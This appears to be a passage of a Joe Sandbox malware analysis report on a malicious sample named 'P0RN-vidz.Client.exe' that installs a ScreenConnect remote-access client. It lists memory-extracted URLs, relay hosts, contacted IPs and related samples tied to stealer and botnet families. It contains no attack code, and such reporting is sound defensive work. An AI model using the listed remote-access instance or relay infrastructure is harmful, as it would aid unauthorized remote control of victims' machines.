                                                                                                                      https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClientScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001299000.00000004.00000020.00020000.00000000.sdmp, NL9Z8XK8.log.1.drfalse
                                                                                                                        		unknown
                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:svchost.exe, 00000007.00000003.2117104298.000001CCF8153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientZuScreenConnect.WindowsClient.exe, 0000000A.00000002.2529761334.000000001B88B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://koidesfac.screenconnect.com-ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530333288.000000001B950000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=806004psvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAsvchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000007.00000002.3278760569.000001CCF78DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://w=3.org/2001/Xdfsvc.exe, 00000001.00000002.3015186666.0000020C3F1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://Passport.NET/tb_comsvchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationDdfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-2008svchost.exe, 00000007.00000002.3279734727.000001CCF8178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exekdfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe.configqdfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application8dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsuersvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instancNL9Z8XK8.log.1.drfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://instance-l7g4dh-relay.screenconnect.com:443/ScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://koidesfac.screenconnect.comdfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D31000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://koidesfac.screenconnect.com/Bin/ScreenConnect.Cliedfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/scgsvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://koidesfac.screencodfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://Passport.NET/STSsvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.manifest:dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstagedfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exxdfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.3003585301.0000020C26B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.edfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config3dfsvc.exe, 00000001.00000002.3018292902.0000020C40D03000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://instance-l7g4dh-relay.screenconnect.com:443/dScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000022B8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000020E4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.000000000228F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000023C4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000023FE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000021EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.0000000002476000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.00000000020B5000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3281565871.000000000216D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://www.w3.odfsvc.exe, 00000001.00000002.3003585301.0000020C26F11000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26F3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://Passport.NET/tbsvchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289529280.000001CCF8184000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2061645464.000001CCF8153000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF812F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF8132000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManagpdfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000007.00000003.2289477636.000001CCF815C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278760569.000001CCF78DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2206424644.000001CCF810E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2237670518.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationyScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001353000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://signup.live.com/signup.aspxsvchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8155000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000001.00000002.3018898554.0000020C40E01000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2529863446.000000001B8C5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001353000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001381000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.3003585301.0000020C26B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://server-nixd2d85b70-web.screenconnect.comdfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C2730D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://login.microsoftonline.com/ppsecure/DeviceAocsvchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    147.75.81.4
                                                                                                                                                                                                                                    		server-nixd2d85b70-relay.screenconnect.comSwitzerland
                                                                                                                                                                                                                                    		54825PACKETUSfalse
                                                                                                                                                                                                                                    147.75.81.6
                                                                                                                                                                                                                                    		server-nixd2d85b70-web.screenconnect.comSwitzerland
                                                                                                                                                                                                                                    		54825PACKETUSfalse

                                                                                                                                                                                                                                    Private

                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                    127.0.0.1

                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                    Analysis ID:1579051
                                                                                                                                                                                                                                    Start date and time:2024-12-20 18:21:34 +01:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:0h 7m 54s
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:14
                                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Sample name:P0RN-vidz.Client.exe
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal48.evad.winEXE@18/82@5/3
                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 72%
                                                                                                                                                                                                                                    • Number of executed functions: 247
                                                                                                                                                                                                                                    • Number of non-executed functions: 27
                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.190.181.23, 20.231.128.66, 40.126.53.8, 20.190.181.3, 20.190.181.5, 40.126.53.10, 40.126.53.12, 40.126.53.15, 2.20.68.201, 2.20.68.210, 92.122.16.236, 192.229.221.95, 20.42.65.92, 20.12.23.50, 13.107.246.63
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                    • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7776 because it is empty
                                                                                                                                                                                                                                    • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7804 because it is empty
                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    • VT rate limit hit for: P0RN-vidz.Client.exe

                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                    12:22:25API Interceptor751496x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                                                                                    12:22:25API Interceptor1x Sleep call for process: P0RN-vidz.Client.exe modified
                                                                                                                                                                                                                                    12:22:25API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                    12:22:58API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                    12:23:24API Interceptor1x Sleep call for process: ScreenConnect.ClientService.exe modified

                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    147.75.81.4SSA-Statement283482.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      SSA-Statement283482.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        server-nixd2d85b70-relay.screenconnect.comSSA-Statement283482.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        • 147.75.81.4
                                                                                                                                                                                                                                        SSA-Statement283482.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        • 147.75.81.4
                                                                                                                                                                                                                                        fp2e7a.wpc.phicdn.netuDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        f4p4BwljZt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        hesaphareketi-20-12-2024-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        17345937653b107659e23b9c28725ee4827d5eb205eece8b9a5c90afbbb742a9832aaefaab913.dat-decoded.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 192.229.221.95
                                                                                                                                                                                                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 192.229.221.95

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        PACKETUSla.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 172.98.171.129
                                                                                                                                                                                                                                        surfex.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                        • 185.218.125.157
                                                                                                                                                                                                                                        http://1click-s.comGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        • 147.75.81.254
                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                                                                                                                                                                                        • 147.75.80.220
                                                                                                                                                                                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 193.26.115.21
                                                                                                                                                                                                                                        armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 23.133.3.186
                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                        • 147.75.84.8
                                                                                                                                                                                                                                        elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                        • 23.133.3.168
                                                                                                                                                                                                                                        loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 185.225.234.108
                                                                                                                                                                                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 193.26.115.21
                                                                                                                                                                                                                                        PACKETUSla.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 172.98.171.129
                                                                                                                                                                                                                                        surfex.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                                        • 185.218.125.157
                                                                                                                                                                                                                                        http://1click-s.comGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        • 147.75.81.254
                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                                                                                                                                                                                        • 147.75.80.220
                                                                                                                                                                                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 193.26.115.21
                                                                                                                                                                                                                                        armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 23.133.3.186
                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                        • 147.75.84.8
                                                                                                                                                                                                                                        elitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                        • 23.133.3.168
                                                                                                                                                                                                                                        loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 185.225.234.108
                                                                                                                                                                                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 193.26.115.21

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0e2AIgdyA1Cl.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                        • 147.75.81.6
